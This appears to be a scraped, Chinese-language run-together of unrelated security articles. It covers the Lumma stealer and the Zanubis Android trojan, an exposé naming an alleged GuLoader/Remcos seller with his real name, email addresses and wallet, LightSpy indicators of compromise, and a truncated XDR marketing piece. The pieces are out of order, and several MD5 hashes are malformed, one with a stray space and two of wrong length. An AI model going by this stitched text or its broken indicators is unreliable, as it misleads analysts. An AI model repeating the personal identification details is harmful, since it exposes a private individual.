Lumma於2022年8月首次被發現，當時研究人員是在新檢測到的樣本中被發現的。大約在同一時間，網絡安全愛好者Fumik0_tweeted發現，Lumma是Mars的“迭代/重構”。從那時起，Lumma經歷了許多變化。 截至目前，研究人員只發現一個樣本（MD5 6b4c224c16e852bdc7ed2001597cde9d）具有收集系統進程列表的功能，同一個樣本還使用了不同的URL與C2通信（/winsock而不是/socket.php）。 研究人員還發現了一個樣本（MD5 844ab1b8a2db0242a20a6f3bbeedf6 b），它似乎是一個調試版本，當到達某些代碼片段時，將向C2發送一個通知。同樣，它使用了一個不同的URL（/wwindg）。 在最近的一個樣本（MD5 a09daf5791d8fd4b5843cd38ae37cf97）中，攻擊者將User-Agent字段更改為“HTTP/1.1”。目前尚不清楚為什麼要這樣做。 儘管之前的所有樣本（包括上面提到的三個樣本），都從C2下載了用於32位系統的附加庫，以便可以解析特定的瀏覽器相關文件（例如密碼等），但MD5 5ac51312dfd99bf4e88be482f734c79只需將整個數據庫上傳到C2。 MD5 d1f506b59908e3389c83a3a8e8da3276具有字符串加密算法。它們現在被十六進制編碼並使用異或密鑰(字符串的前4個字節)加密。 研究人員看到的最大變化之一涉及MD5 c2a9151e0e9f417e555cf90300b45c9，此樣本支持從C2檢索的動態配置文件。此配置是Base64編碼的，並與配置文件的前32個字節進行異或。 “debugging”樣本的代碼段 ZanubisZanubis是一個Android銀行木馬，最早出現在2022年8月左右，目標是秘魯的金融機構和加密貨幣交易所用戶。 Zanubis的主要感染途徑是通過模仿合法的秘魯Android應用程序，然後欺騙用戶啟用可訪問性權限，從而完全控制設備。 研究人員在2023年4月左右在野外發現了很多Zanubis樣本，該惡意程序偽裝成秘魯政府組織SUNAT的官方Android應用程序。研究人員探索了惡意程序的新設計和功能，它似乎經歷了幾個階段的演變，達到了一個新的複雜程度。 Zanubis是在Obfuscapk的幫助下進行混淆的，Obfuscapk是一個流行的Android APK文件混淆處理程序。在受害者授予惡意應用程序訪問權限後，就可以允許其在後台運行。惡意程序使用WebView加載用於查找債務的合法SUNAT網站，這裡的目的是讓毫無戒心的用戶相信該應用程序是SUNAT服務生態系統的一部分。 與C2的通信依賴於WebSockets和稱為Socket.IO的庫，後者允許惡意程序建立到C2的持久連接，這提供了故障轉移選項（從WebSockets到HTTP，反之亦然）。另一個優點是，它為C2提供了一個可擴展的環境，如果需要，Zanubis的所有新感染都可以大規模地從C2接收命令(也稱為事件)。一旦惡意程序啟動，植入程序就會調用一個函數來檢查與C2的連接，它建立到同一C2服務器的兩個連接，但它們執行不同類型的操作，並且只有在C2請求時才建立第二個連接。 Zanubis沒有使用預先填充和硬編碼的目標應用程序列表。近年來，惡意程序開發人員傾向於在目標列表中添加或刪除應用程序的名稱，為了在植入程序上設置目標應用程序，C2發送事件config_packages。隨事件一起發送的JSON對象包含一個數組，該數組指定惡意程序應監控的應用程序，每當屏幕上發生事件時，惡意程序就會解析目標應用程序的列表，例如惡意程序使用onAccessibilityEvent函數檢測到的應用程序打開。一旦發現列表上的應用程序在設備上運行，Zanubis就會根據其配置採取兩種操作來竊取受害者的信息：記錄事件/密鑰，或錄屏。 之前，研究人員提到初始化來自受感染設備的第二個連接，這為C2提供了更多選項。 Zanubis建立這個新連接後，它會向服務器發送一個VncInit事件，通知它第二個功能集的初始化已經完成，並且它會每秒發送關於屏幕渲染的信息，例如顯示大小。研究人員可以假設這是運營商控製或後門感染手機的一種方式。 第二個集合中一個有趣的功能是bloqueoUpdate事件。這是惡意程序採取的最具攻擊性和說服力的行動之一，它假裝是Android更新，從而阻止手機被使用，隨著“更新”的運行，手機仍然無法使用，以至於無法鎖定或解鎖，因為惡意程序會監控並阻止這些嘗試。 虛假更新將用戶鎖定在手機之外 根據研究人員的分析，目標申請是秘魯的銀行和金融實體。另外，根據研究人員的監測數據，他們確定Zanubis專門針對該國的用戶，目標應用程序列表包含40多個程序包名稱。截止目前，收集的Zanubis樣本能夠感染任何Android手機，但它們都是以西班牙語作為系統語言編寫的。 總結惡意程序在不斷發展，Lumma竊取程序就是一個例子，它有多種功能各異的變體。 Zanubis目標是成為一個功能齊全的銀行木馬，可以造成經濟損失並竊取移動用戶的個人數據，惡意代碼和攻擊者TTP的不斷變化對防禦團隊來說是一個挑戰。

GuLoader和Remcos關係大揭秘（上） 來自VgoStore的GuLoader及其與CloudEyE的關聯研究人員在2023年看到的樣本，是否真的是在2020年發現的與CloudEyE有關的GuLoader嗎？ 事實上，GuLoader現在看起來真的不一樣了。該執行不像2020年在GuLoader中那樣涉及VB6應用程序，現在它以VBS腳本或NSIS可執行文件的形式傳播。 2020和2023版本唯一的共同點是GuLoader核心功能：加密shellcode，然而，這一部分也發生了重大變化。正如研究人員在上一篇文章中所描述的，GuLoader的開發人員使用了新的模糊處理技術，這些技術掩蓋了真實的執行流，並使自動反彙編工具和調試器無法分析代碼，新版本還使用算術運算實現了數據模糊處理。 然而，研究人員仍然設法在代碼中找到了相似之處，在下面的屏幕截圖中，您可以看到這兩個版本都使用了反調試技巧：修補DbgUiRemoteBreakIn和DbgBreakPoint函數。儘管由於新版本中的混淆，程序集代碼非常不同，但在2020年和2023年的GuLoader版本中，相同的字節用於覆蓋研究人員在卸載代碼後可以看到的函數的代碼。 2020年和2023年GuLoader版本的代碼相似性 一般來說，關於反分析技術，兩個版本的列表非常相似。很明顯，反分析技術的數量隨著每個新版本的發布而增加。 此外，所有版本的shellcode都使用大型結構來存儲shellcode執行的各個階段可能需要的全局變量，該結構的基址存儲在EBP寄存器中。此結構中各種變量的偏移量在不同版本之間發生了變化，而其他偏移量保持不變。 研究人員最近在2023年分析的樣本（MD5:40b9ca22013d02303d49d8f922ac2739）和2020年的舊樣本（MD5:d621b39ec6294c998580cc21f33b2f46）中得出： 2023年和2020(CloudEyE)的GuLoader的全局結構中API函數指針的相同偏移量 在這兩個樣本中，存儲許多API函數地址的變量的偏移量是相同的。 研究人員還發現了GuLoader的中間版本可供研究人員使用，他們在2021年和2022年確定了這些樣本。讓我們比較一下研究人員從2021年首次看到的樣本中提取的解密例程代碼（MD5:abf39daaa33505f26959db465116f21f）與上一個樣本中的2023 GuLoader樣本中的例程(MD5：40b9ca22013d02303d49d8f922ac2739)。由於混淆，這些函數中的彙編代碼略有不同，然而，如果研究人員使用反編譯器，他們會得到兩個樣本相同的結果。 2021年和2023年的GuLoader版本中相同的反編譯代碼 由於類似的行為和代碼模式，研究人員的惡意軟件自動分類和配置提取工具將這些樣本識別為GuLoader。 2021年、2022年和2023年的樣本被確定為GuLoader 研究人員使用自動分析處理了6000多個GuLoader樣本，這些樣本按首次看到的日期排序，並識別了不同版本的GuLoader，這也使研究人員能夠構建GuLoadershellcode版本的時間表。在下表中，研究人員標記了數據加密和模糊處理算法發生重大變化的版本的字符串，包括用於下載有效負載的URL，以及有效負載解密密鑰： 不同GuLoader shellcode版本出現的時間 該圖表顯示，對於GuLoader shellcode的每個新版本，舊版本的樣本數量都大大減少。以上列出的所有事實使研究人員確信，GuLoader的新版本，包括VgoStore演示的樣本，仍然是研究人員在2020年展示的與CloudEyE和Securitycode.eu相關的惡意軟件。 BreakingSecurity和VgoStore的幕後黑手如上所述，暱稱為“EMINэM”的用戶是BreakinSecurity.net官方Telegram群組的負責人： “EMINэM”Telegram用戶詳細信息 研究人員可以在“EMINэM”發布的視頻中看到非常具體的製品，其中包括桌面“This PC”和文件夾“EM1NeM”的自定義圖標： EMINэM的桌面工件 研究人員可以用這些來識別“EMINэM”創建的視頻。 現在讓回到@VgoStore_Group群，在該群的管理員中，可以看到兩個用戶：“EMINэM”(自定義標題為“Trusted Vendor”)和VGO (@VgoStore)： VgoStore Telegram群管理員 VGO和“EMINэM”偽裝成不同的用戶，研究人員甚至可以在這個組中找到他們之間的“對話”： VGO與“EMINэM”之間的“對話” 然而，如果研究人員仔細觀看用戶VGO發布的視頻，研究人員會注意到用戶“EMINэM”發布的相同的偽裝對象： “EMINэM”在VGO發布的視頻中的桌面 關於本視頻中“EMINэM”桌面的工件，研究人員注意到一個細節。他們看到用戶通過WinSCP連接到遠程主機，並打開文件夾“/var/www/html/zarath”，研究人員在主機“194.180.48.211”上發現了一個同名的打開目錄，這是研究人員在分析用戶VGO演示TheProtect的VBS變體的視頻時發現的，研究人員將其識別為GuLoader。 基於此，研究人員可以假設BreakingSecurity和VgoStore Telegram群都由同一個人控制，並且他還擁有兩個帳戶：“EMINэM”和VGO。 接下來，研究人員嘗試在Google上搜索“VgoStore”，發現用戶“VgoStore”在“wordpress.org”網站論壇上尋求WordPress插件的幫助。在對話期間，用戶發布了屬於YouTube用戶“EMINe M”(@BreakingSecurity)的兩個未列出的YouTube視頻的鏈接： “EMINэM”在“wordpress.org”網站論壇上發布的未列出的YouTube視頻 在視頻“2023 01 26 15 18 16”(https：//www.youtube.com/watch?v=L8yB_xybTPs)的開頭，研究人員看到了視頻中“EMINэM”的桌面上的熟悉的真人快打壁紙。研究人員還可以看到遠程桌面的IP地址“173.212.217.108”，“EMINэM”通過它訪問虛擬主機面板和電子郵件“abudllah.alshamsy(at)gmail[.]com”： 通過遠程桌面由“EMINэM”管理的服務器的IP地址 在第二個視頻(“2023 01 26 20 02 07”，https：//www.youtube.com/watch?v=KHp07C3DgWo)中，研究人員觀察到VgoStore WordPress管理面板，BreakingSecurity和VgoStore的“訂單”選項卡同時打開： BreakingSecurity和VgoStore的“訂單”選項卡在“EMINэM”的視頻中同時打開 儘管試圖隱瞞與VgoStore的任何直接聯繫，但可以發現“EMINэM”原來是BreakingSecurity和VgoStore網站以及Telegram群的管理員。 EMINэM的身份“EMINэM”在WordPress論壇上發布的一個視頻(“2023 01 26 15 18 16”，https：//www.youtube.com/watch?v=L8yB_xybTPs)相當長。 “EMINэM”在不同的窗口之間反复切換，其中一些幀顯示了有助於研究人員調查的敏感數據。 “EMINэM”使用“Rabea Akram”假名通過電子郵件(expert.eminem@gmail[.]com)與網站通信： “EMINэM” 使用假名管理的相關網站 在10：36處，研究人員可以看到“EMINэM”以“Shadi Gharz Elddin”的名義預訂了航班： “EMINэM”在航班預訂確認電子郵件中的真實姓名 研究人員很容易就找到了Shadi Gharz的Facebook和Twitter賬戶，他在這些賬戶上公開寫道，他的工作地點是BreakingSecurity： Shadi Gharz的社交網絡頁面 知道“EMINэM”的真名是Shadi後，就可以假設選擇“EMINэM”這個暱稱的來源很可能是藝術家Eminem的歌曲“the real Slim Shady”。 由“EMINэM”進行的惡意活動除了前面提到的樣本(SHA256：63559daa72c778e9657ca53e2a72deb541cdec3e0d36ecf04d15ddbf3786aea8, c914dab00f2b1d63c50eb217eeb29bcd5fe20b4e61538b0d9d052ff1b746fd73)之外，研究人員發現“EMINэM” 在過去幾年中策劃許多攻擊。 1. 在Eminem於2021年發布的一段視頻https：//youtu.be/5xpYjLbDpnE?t=84中，在1：24處，研究人員看到了瀏覽器的歷史記錄： “EMINэM”的瀏覽器歷史記錄包含Formbook CC服務器的地址 上面的列表包含用於控制木馬和檢索被盜數據的Formbook信息竊取面板的地址。以下是使用給定地址的CC服務器的Formbook樣本列表： 2. 在“EMINэM”發布的不同視頻中，研究人員注意到他通過RDP或SFTP管理的服務器的幾個IP地址。 研究人員能夠下載前面提到的打開目錄“hxxp：//194.180.48.211/zarath/”的當前內容： “194.180.48.211/zarath/”的內容 研究人員發現這個文件夾中的一部分文件是GuLoader加密的shellcode，其餘的是加密的有效負載，其中大多數是Remcos。雖然開發人員可能會聲稱Remcos和GuLoader (CloudEyE, TheProtect)是合法軟件，但研究人員也在這個文件夾中發現了兩個真正的惡意有效負載，研究人員將其識別為Amadey Loader，以及相應的加載和解密這些有效負載的GuLoader shellcode： 3.在2022年4月19日“EMINэM”在@BreakingSecurity_Group群中發布的視頻中，研究人員看到他如何以root用戶(這意味著他是該服務器的所有者)連接到名為“CaliPB”的遠程服務器，IP地址為“38.242.193.23”： “EMINэM”以root用戶身份使用WinSCP連接到他的服務器 在下一個截圖中，研究人員可以通過web訪問“/var/www/html”文件夾的內容，並註意到一個名為“private”的子文件夾： “EMINэM”服務器上文件夾' /var/www/html '的內容 不幸的是，無法檢索“私有”文件夾的內容，然而，研究人員仍然能夠使用VirusTotal找到相關的樣本。研究人員分析了之前從主機“38.242.193.23”下載的樣本。其中，研究人員找到了GuLoader和Remcos： 在這個表中，研究人員再次看到之前與“EMINэM”連接的IP地址“194.180.48.211”和“173.212.217.108”，但是現在研究人員看到新的IP地址“185.217.1.137”被用作Remcos的CC服務器。該IP地址屬於提供端口轉發服務的nVPN，可能是“EMINэM”用來隱藏其Remcos CC服務器的真實IP地址。研究人員的假設得到了以下事實的證實，在其中一個視頻中，研究人員在“EMINэM”的郵箱中看到一封來自nVPN的信： “EMINэM”收到的nVpn.net確認電子郵件 研究人員還發現了一個域名“vrezvrez.com”，該域名在錄製視頻期間被解析為IP地址“38.242.193.23”，另外還發現了5個4.1版本的Formbook樣本，它們的CC服務器URL為“vrezvrez.com/private/”： 因此，證據顯示，Eminem不僅參與了Remcos和GuLoader的攻擊，還使用了Formbook和Amadey Loader等知名惡意軟件。 收入分析研究人員在WordPress論壇上發現的由“EMINэM”上傳的未列出的YouTube視頻“2023 01 26 15 18 16”包含了更多有助於研究人員調查的數據。研究人員在5：41處看到“EMINэM”的Gmail帳戶的收件箱，研究人員注意到了來自tochkaobmena.com服務的郵件。在視頻中可以從電子郵件中恢復鏈接： https：//tochkaobmena.com/hst_FhaMv1rUzBTMfXlgR71vRjafr47K0wQyjuF/ 數字貨幣兌換確認包含一個URL 點擊鏈接，就可以找到了包含數字資產交換操作結果的頁面（Perfect Money USD-Tron USDT），其中包含Tron區塊鏈錢包地址：TLqC6F4AVs8MrdiQDgRuFcW2Xp3iY3hg2D，研究人員分析了交易記錄，併計算了該賬戶在過去一年天內收到的近6萬美元收入。 很明顯，BreakingSecurity和VgoStore只有部分資金是通過這個錢包流動的，詳細觀看視頻後，研究人員可以更好地了解VgoStore的收入。在5:06處，我們看到WordPress管理頁麵包含WooCommerce插件的報告： WordPress管理頁面顯示銷售統計數據 15000美元可被視為VgoStore網站上Remcos和其他服務銷售的月收入估計。 總結Remcos和GuLoader等工具曾經只在黑客論壇上出售，現在卻偽裝成合法產品公開，這種工具現在很容易獲得，在懷有惡意的個人中很受歡迎。 調查結果顯示，一個化名為EMINэM的個人管理著BreakingSecurity和VgoStore網站，這些網站以新名稱TheProtect公開出售Remcos和GuLoader。研究人員還發現了EMINэM參與惡意軟件傳播的證據，包括臭名昭著的Formbook信息竊取程序和Amadey Loader，與此同時，EMINэM利用TheProtect繞過殺毒軟件的能力，將其用於自己的惡意目的。 根據這些發現，很明顯，BreakingSecurity、VgoStore及其產品所宣傳的合法性只不過是煙幕彈，這些服務背後的個人與網絡犯罪社區緊密相連，利用他們的平台為非法活動提供便利，並從銷售充滿惡意軟件的工具中獲利。

針對香港iOS用戶進行水坑攻擊的LightSpy惡意軟件，近日被發現嵌入在來自20台活躍服務器的安卓植入體Core（核心）及其14個相關插件當中，用於攻擊移動用戶。 LightSpy是一種移動高級持續性威脅（mAPT），它使用新穎的複雜技術來攻擊移動用戶。其中，這個惡意軟件已被證實出自黑客組織APT41之手。 最近的報告表明，該惡意軟件一直在使用微信支付系統訪問支付數據、監控私密通信，並執行各種惡意活動。 LightSpy APT攻擊微信用戶據多起報告顯示，LightSpy惡意軟件是一套功能齊全的模塊化監視工具集，被發現使用各種插件來洩露並竊取私密數據和支付數據。此外，該惡意軟件強烈關注受害者的私密信息。 其功能包括：利用後端基礎設施從微信支付中洩露支付數據，並從微信獲取音頻相關功能，以記錄受害者的VOIP對話內容。 然而，該惡意軟件不能作為一個獨立的應用程序來運行，因為它也是一個插件，該惡意軟件的核心負責執行整條攻擊鏈所需的所有功能。 核心功能包括設備指紋收集、控制服務器連接建立、從服務器檢索命令以及更新自身和額外的攻擊載荷文件（又叫作插件）。 LightSpy的14個插件該惡意軟件已添加了多個插件，包括soft list（軟列表）、baseinfo（基礎信息）、bill（賬單）、cameramodule（攝像頭模塊）、chatfile（聊天文件）、filemanager（文件管理器）、locationmodule（位置模塊）、locationBaidu（位置百度）、qq、shell、soundrecord（錄音）、telegram、wechat（微信）和wifi。 信息來源： ThreatFabric 正如報告中提到，最重要的插件之一是位置模塊插件，它負責位置跟踪，可以發送當前位置的快照，也可以設置指定時間間隔的位置跟踪。這個插件基於兩個位置跟踪框架：騰訊位置SDK和百度位置SDK。 另一個重要的插件是Soundrecord（錄音）插件，它負責錄製音頻。這個插件還可以立即或在指定的時間間隔開始麥克風錄音。此外，這個插件還可以記錄來電通話內容。 Bill（賬單）插件是另一個重要的插件，它負責從微信支付收集受害者的支付歷史信息，這包括上一筆賬單的ID、賬單類型、交易ID、日期以及已支付處理的標誌。 iOS命令和安卓命令之間的關係（來源：ThreatFabric） 基礎設施LightSpy基礎設施包含幾十個服務器，分佈在中國大陸、中國香港、中國台灣、新加坡和俄羅斯，由於一些服務器返回不同的命令和載荷，可以推測攻擊者為每次活動使用不同的IP地址或域。與此同時，由於一些服務器返回載荷（應該是在2018年編譯的），可以假設攻擊者可以在幾個攻擊活動中重複使用同一套基礎設施。另一個關於長壽命服務器的假設是，安全行業人士常常不會發現/披露這些服務器，因此不需要更改IP地址。 在分析LightSpy基礎設施時，我們發現了兩個值得注意的時刻： LightSpy與AndroidControl（WyrmSpy）的聯繫 我們獲取了硬編碼到核心中的IP地址，與Lookout報告中披露的IP地址是同一個。 圖1 結果是35900端口已關閉，主機沒有響應LightSpy請求。同時，有幾個開放的端口提供https服務。 端口11090對應的https服務器使用過期證書加以保護，SHA256指紋為f0fc2c418e012e034a170964c0d68fee2c0efe424a90b0f4c4cd5e13d1e36824，還有另外兩台主機使用相同的服務和相同的證書。兩台主機都打開了端口443，服務於一個名為AndroidControl v1.0.4的管理面板。 圖2 有第三台主機具有相同的收藏夾圖標（MD5散列542974b44d9c9797bcbc9d9218d9aee5），它託管相同的面板。這個主機上的面板錯誤配置，暴露了應該用於前後端之間通信的後端端點： 圖3 第一個值得關注的點是“控制”端點，這種端點位於Lookout報告的WyrmSpy樣本中。 為了確認這三個主機與WyrmSpy有關，我們做了一個簡單的請求雙“控制”端點，看到了相同的結果： 圖4 在WyrmSpy的代碼中，我們可以看到它等待對含有字段“suc”的請求進行響應： 圖5 因此，這三個主機都是WyrmSpy的活躍C2，或者正如攻擊者所命名的AndroidControl或androidRat。 由於面板在處於調試模式的Django中，它暴露了一些內部信息，比如一個內部文件夾（整個前端和後端文件存儲在服務器中），以及另一個IP地址47.115.7[.]112： 圖6 LightSpy面板其中一台C2服務53601端口，該服務含有Admin面板： 圖7 面板在VUEJS中，除了面板結構外，我們在底層沒有發現任何值得注意的痕跡。 VUEJS節點的功能仍然不清楚。 圖8 一篇關於LightSpy的完整報告已經由ThreatFabric發布（詳見https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack），提供了有關威脅途徑、源代碼、分析及其他信息的詳細信息。 攻陷指標控制服務器：域 spaceskd[.]com IP 103.27.108[.]207 46.17.43[.]74 文件哈希：第二階段載荷（smallmload .jar） SHA256 407abddf78d0b802dd0b8e733aee3eb2a51f7ae116ae9428d554313f12108a4c bd6ec04d41a5da66d23533e586c939eece483e9b105bd378053e6073df50ba99 核心SHA256 版本 68252b005bbd70e30f3bb4ca816ed09b87778b5ba1207de0abe41c24ce644541 6.5.24 5f93a19988cd87775ad0822a35da98d1abcc36142fd63f140d488b30045bdc00 6.5.24 bdcc5fc529e12ecb465088b0a975bd3a97c29791b4e55ee3023fa4f6db1669dc 6.5.25 9da5c381c28e0b2c0c0ff9a6ffcd9208f060537c3b6c1a086abe2903e85f6fdd 6.2.1 a01896bf0c39189bdb24f64a50a9c608039a50b068a41ebf2d49868cc709cdd3 6.5.19 77f0fc4271b1b9a42cd6949d3a6060d912b6b53266e9af96581a2e78d7beb87b 6.2.0 d640ad3e0a224536e58d771fe907a37be1a90ad26bf0dc77d7df86d7a6f7ca0e 6.2.1 3849adc161d699edaca161d5b6335dfb7e5005056679907618d5e74b9f78792f 6.2.6 2282c6caef2dd5accc1166615684ef2345cf7615fe27bea97944445ac48d5ce4 5.2.1 插件插件名稱 SHA256 softlist 7d17cdc012f3c2067330fb200811a7a300359c2ad89cdcf1092491fbf5a5a112 baseinfo cc6a95d3e01312ca57304dc8cd966d461ef3195aab30c325bee8e5b39b78ae89 bill c6ccd599c6122b894839e12d080062de0fa59c4cd854b255e088d22e11433ef6 cameramodule bace120bf24d8c6cfbb2c8bfeed1365112297740e2a71a02ea2877f5ffc6b325 chatfile 7d8a08af719f87425d1643d59979d4a3ef86a5fc81d1f06cfa2fd8c18aeb766b filemanager e5bdeedac2c5a3e53c1fdc07d652c5d7c9b346bcf86fc7184c88603ff2180546 locationmodule bf338e548c26f3001f8ad2739e2978586f757777f902e5c4ab471467fd6d1c04 locationBaidu 177e52c37a4ff83cd2e5a24ff87870b3e82911436a33290135f49356b8ee0eb1 qq f32fa0db00388ce4fed4e829b17e0b06ae63dc0d0fac3f457b0f4915608ac3b5 shell e1152fe2c3f4573f9b27ca6da4c72ee84029b437747ef3091faa5a4a4b9296be soundrecord c0c7b902a30e5a3a788f3ba85217250735aaaf125a152a32ee603469e2dfb39e telegram 71d676480ec51c7e09d9c0f2accb1bdce34e16e929625c2c8a0483b9629a1486 wechat bcb31d308ba9d6a8dbaf8b538cee4085d3ef37c5cb19bf7e7bed3728cb132ec1 wifi 446506fa7f7dc66568af4ab03e273ff25ee1dc59d0440086c1075d030fe72b11

數據可以說是互聯網時代的黃金和鑽石。黑客一直在虎視眈眈的盯著這塊肥肉，他們不斷地計劃、準備和執行複雜的有針對性的攻擊，剝奪企業有價值的數據。 擴展檢測和響應(XDR) 提供了一種保護業務數據免受高級威脅的方法。 XDR 安全解決方案旨在簡化事件響應，為安全團隊配備創新的威脅檢測技術，以改進和加速響應工作流程。然而，大多數現成的XDR 平台僅涵蓋常見任務，迫使具有獨特安全需求的組織尋找可定制的選項。 在本文中，我們將仔細研究XDR 平台的本質，討論XDR 的優勢，比較不同類型的平台，並分析常見架構和功能集。我們還概述瞭如果您決定構建或定制這樣的平台需要注意的事項。本文將有助於技術領導者評估各種實施選項並考慮創建自定義XDR 解決方案。 如何利用XDR 增強業務數據安全業務數據駐留在多個端點並通過無盡的渠道流動，形成了一個如此龐大和復雜的安全環境，傳統工具無法再對其進行保護。 由於沒有集中的地方來監控、分析和管理數據的安全性，企業在面對高級威脅和復雜的網絡安全攻擊時常常感到茫然不知所措。最近迫切需要轉向遠程工作，這凸顯了擁有這樣一個集中的數據可見性和管理點的重要性和價值。 針對這一需求，安全專業人士提出了一個新概念：擴展檢測和響應。 什麼是XDR 平台？ 雖然XDR 平台還沒有統一的定義，但該概念的創建者Nir Zuk和Microsoft提出的流行定義可以總結如下： XDR 平台是一種解決方案，它提供了一個統一點，用於從各種來源收集安全數據，從而實現上下文數據分析、高級威脅檢測和有效響應。 XDR 安全平台的概念可以被視為其前身演變的下一步： 端點檢測和響應(EDR) 安全信息和事件管理(SIEM) 安全編排、自動化和響應(SOAR) XDR 系統應該與其前身有效集成，不僅包括先進的EDR、SIEM和SOAR 系統，還包括防火牆和防病毒軟件等更常見的工具。利用所有這些工具和系統作為數據和功能源，XDR 使安全團隊最終能夠克服他們過去處理的限制和網絡安全問題，我們將在下一節中介紹這些問題。 您的企業如何從使用XDR 平台中受益？儘管XDR 解決方案的功能集可能有所不同，但它們的目標保持不變- 幫助安全專家解決傳統網絡安全工具的常見局限性： 來自不同安全工具和服務的孤立數據。此類數據降低了威脅檢測和事件響應的效率，因為安全專家必須手動關聯不同來源的數據才能了解事件的全貌。 XDR 平台可以通過將來自不同系統、服務和工具的數據聚合到一個地方來幫助簡化數據管理。 缺乏跨多個安全層的可見性。大量安全數據來自不同的IT 環境：端點、網絡和雲。使用傳統的網絡安全工具，很難從所有數據中構建出一個大的、統一的圖片。例如，通過EDR，您可能會看到攻擊者使用的入口點，但有關攻擊的進一步分佈以及受其影響的用戶和系統的信息有限。 XDR 解決方案擴展了整個IT 基礎設施的可見性，使安全專家能夠關聯來自不同來源的威脅指標並獲取每個事件的完整背景。 大量誤報導致警報疲勞。這給安全團隊帶來了不必要的開銷，並增加了低效處理造成真正危險的事件和威脅的風險。 XDR 平台可以通過統一從不同來源收集的數據、應用高級警報規則以及提高整體工作流程自動化來減少發送給安全團隊的警報數量。 來自多種攻擊媒介的高級威脅以及使用機器學習(ML) 和人工智能(AI) 等先進技術執行的攻擊。傳統安全解決方案很難檢測到此類威脅。通過應用先進的分析技術、機器學習和人工智能機制來關聯和處理收集的數據，XDR 工具可以更輕鬆地檢測和響應此類威脅。 主要基於手動操作的不良事件響應很容易出現人為錯誤，並通過增加平均響應時間來升級威脅。借助XDR，您可以訪問改進的威脅分析和響應操作的精細自動化，從而提高安全團隊的效率。 借助XDR 平台檢測威脅並緩解威脅的通常工作流程包括三個主要階段： 1. 攝取— 從不同來源收集數據：端點、雲環境、網絡流量等。 2. 檢測— 使用先進的機器學習算法和人工智能模型關聯和分析收集的數據。 3. 響應— 根據檢測到的威脅的優先級安排自動響應，並收集手動調查所需的上下文數據。 雖然XDR 安全概念相對較新，但企業已經面臨多個XDR 平台可供選擇。在以下部分中，我們將討論在尋找適合您業務需求的XDR 平台時應注意的事項，以及如何確定構建自定義平台是否對您有利。 選擇正確的XDR 解決方案時應遵循的標准在決定將哪種現成XDR 產品用於組織的網絡安全時，請注意以下三個主要標準： 所需功能— 在完成相同的高級任務的同時，現成的XDR 安全工具提供不同的功能集。有些可能擁有更強大的人工智能模塊，而另一些則提供複雜的數據保護機制。做出最終選擇時請考慮您的個人要求。 配置靈活性— 您希望XDR 系統的靈活性越高，找到合適的系統就越困難。然而，在配置數據聚合、事件響應場景或報告時，靈活性至關重要。提前確定您想要高度可定制的功能。 易於管理——作為一個複雜的解決方案，XDR 平台可能很難編排和管理。根據平台的類型（稍後詳細介紹），您可能需要付出額外的努力來配置和維護它。 了解這些標準將幫助您確定XDR 系統的核心要求，從而找到適合您的系統。 評估現成的XDR 解決方案時需要考慮的另一個重要細節是平台類型。目前，您可能會遇到兩種常見的XDR解決方案： 1. 原生XDR 平台集成了來自單一供應商的安全工具和解決方案。此類平台的主要優點之一是最大限度地減少兼容性和集成問題。與此同時，這些平台最容易受到供應商鎖定，因此靈活性最差。使用第三方工具擴展平台功能的選項並不多。 本機XDR 的常見示例包括Microsoft 365 Defender、Cisco XDR 和Palo Alto Networks Cortex XDR。 2. 開放XDR平台不限於單一供應商的產品和服務。雖然仍然提供集中式平台管理功能，但它們依賴於不同供應商的第三方工具和服務。與原生平台相比，此類平台往往更加靈活，但仍然存在供應商鎖定的風險，因為您很少能夠選擇核心功能的提供商。 據Gartner 稱，開放XDR 包括Splunk、LogRhythm 和QRadar。 一些XDR 供應商以託管服務的形式提供解決方案。與雲服務提供商類似，託管檢測和響應(MDR)供應商自行幫助企業配置和編排其網絡安全資源。然而，就像常規雲服務一樣，默認的MDR 服務是基於訂閱的，這對於某些企業來說可能不是最佳的財務解決方案。它們還提供有限的可擴展性和靈活性，並且並不總能滿足醫療保健或金融等受到嚴格監管的行業的獨特要求。 據Gartner 稱，提供MDR 服務的供應商包括Sophos、ReliaQuest 和Arctic Wolf。 如果現有解決方案沒有完全滿足您的要求，您可以考慮可能的自定義選項- 下一節將詳細介紹。

惡意軟件經常將自己偽裝成合法工具，最近比較有代表性的例子是Remcos RAT(遠程管理工具)和GuLoader(也稱為CloudEyE Protector)，他們在最流行的惡意軟件排名中佔據榜首位置。 Remcos和GuLoader在十大惡意軟件中的排名 由於Remcos很容易被殺毒軟件檢測到，因此很難用於攻擊，然而，GuLoader可以用來幫助Remcos繞過殺毒軟件。目前，GuLoader現在在與Remcos相同的平台上以新名稱銷售，並被包裝成為一種加密器，使其有效負載完全無法被檢測到。此外，監督該平台的管理員還管理BreakingSecurity網站，該網站是Remcos RAT和相關Telegram通道的官方網站。有證據表明，銷售Remcos和GuLoader的個人使用Amadey和Formbook等惡意軟件，並使用GuLoader作為預防措施，與Remcos和GuLoader賣家相關的域名和IP地址出現在惡意軟件分析報告中。 Remcos和GuLoader的賣家清楚地意識到他們的工具被攻擊者所利用，儘管他們聲稱自己是無辜的。研究人員最終曝光了負責出售Remcos和GuLoader的個人，揭露了他們的社交網絡，並揭示了通過這些非法活動產生的大量收入。 GuLoader 和Remcos的關係GuLoader於三年多前被發現，其是一個高度保護的基於shellcode的加載器，它採用了許多技術來防止手動和自動分析。此外，在最近的樣本中，通過使用.LNK文件、VBS和PowerShell腳本，利用了來自遠程服務器的代碼片段的多階段加載，這些技術的結合允許GuLoader樣本在VirusTotal上實現零檢測率，並將任何惡意負載傳遞到受害者的計算機上。 2020年，研究人員曝光了一個通過securitycode.eu 銷售CloudEyE的平台，它與GuLoader有關，這迫使創建者暫停運營。在他們的網站上，他們發布了一條消息，稱他們的服務旨在保護知識產權，而不是傳播惡意軟件。 幾個月後，他們的網站恢復了CloudEyE的銷售，不久之後，研究人員在監測中觀察到新的GuLoader攻擊數量增加，以及新版本的出現。目前，研究人員每天會監控到數十個新的GuLoader樣本。 過去6個月每天涉及GuLoader的攻擊次數 在之前關於最新版本GuLoader的分析中，研究人員故意省略了CloudEyE和新版本GuLoader之間的任何联系，因為他們觀察到GuLoader在名為“VgoStore”的網站上以另一個名稱“The Protector” 傳播。事實證明，VgoStore與Remcos密切相關。 